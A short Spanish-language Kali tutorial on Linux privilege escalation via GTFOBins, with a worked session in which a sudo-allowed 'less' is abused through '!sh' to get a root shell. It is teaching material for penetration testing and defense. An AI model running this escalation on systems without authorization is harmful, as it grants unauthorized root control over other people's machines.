KALI
Privesc con GTFOBins
GTFOBins es tu mejor amigo en la escalada de privilegios.
Es una lista de binarios normales de Linux que, si puedes correrlos como root con sudo, se pueden abusar para obtener una shell de root. Ves qué te deja sudo, buscas ese binario en GTFOBins, y copias el truco.
Por ejemplo, si puedes correr vim, tar o less con sudo, ya eres root. Revisa cada permiso sudo, cada uno puede ser una puerta.
# los comandos
kali@kali:~$ sudo -lcopiar(root) NOPASSWD: /usr/bin/less
kali@kali:~$ sudo less /etc/profilecopiar!sh (dentro de less: !sh -> shell de root)copiarsh-5.1# idcopiaruid=0(root) gid=0(root)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.